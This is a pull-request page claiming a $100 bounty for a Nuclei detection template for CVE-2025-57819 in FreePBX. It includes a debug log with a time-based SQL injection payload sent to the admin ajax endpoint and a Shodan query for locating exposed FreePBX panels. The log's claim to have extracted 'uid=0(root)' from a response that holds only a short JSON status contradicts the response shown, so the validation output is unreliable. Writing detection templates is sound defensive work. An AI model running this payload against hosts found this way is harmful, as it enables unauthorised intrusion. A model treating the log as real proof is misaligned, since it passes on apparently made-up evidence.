PR
Add Nuclei template for CVE-2025-57819 - FreePBX RCE
projectdiscovery/nuclei-templates#13097
Template / PR Information
- Added CVE-2025-57819
- References:
Template Validation
I’ve validated this template locally?
- YES
- NO
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://localhost:8081 -t CVE-2025-57819.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.6
[INF] Current nuclei version: v3.4.6 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-57819] Dumped HTTP request for http://localhost:8081/admin/ajax.php?module=userman&command=checkPasswordReminder
POST /admin/ajax.php?module=userman&command=checkPasswordReminder HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json
Content-Length: 45
username=admin' OR SLEEP(5)-- -&password=test
[DBG] [CVE-2025-57819] Dumped HTTP response http://localhost:8081/admin/ajax.php?module=userman&command=checkPasswordReminder
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Server: Apache/2.4.38 (Debian)
Content-Length: 32
{"status":"true","data":"1"}
[INF] [CVE-2025-57819] [http] [critical] http://localhost:8081/admin/ajax.php?module=userman&command=checkPasswordReminder
[INF] [CVE-2025-57819] [elapsed] Time-based SQLi detected (delay >=5s)
[INF] [CVE-2025-57819] [extract] uid=0(root) gid=0(root) groups=0(root)
Additional Details
- Shodan Query: http.title:“FreePBX Administration”
- Docker Test: tiredofit/freepbx:15-latest
Additional References:
- Nuclei Template Creation Guideline
- Nuclei Template Matcher Guideline
- Nuclei Template Contribution Guideline
- PD-Community Discord server
/claim #13087
Claim
Total prize pool
$100
Total paid
$0
Status
Pending
Submitted
September 04, 2025
Last updated
September 04, 2025
Contributors
K
K ARYA SEKHAR DAS
@intelligent-ears
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$100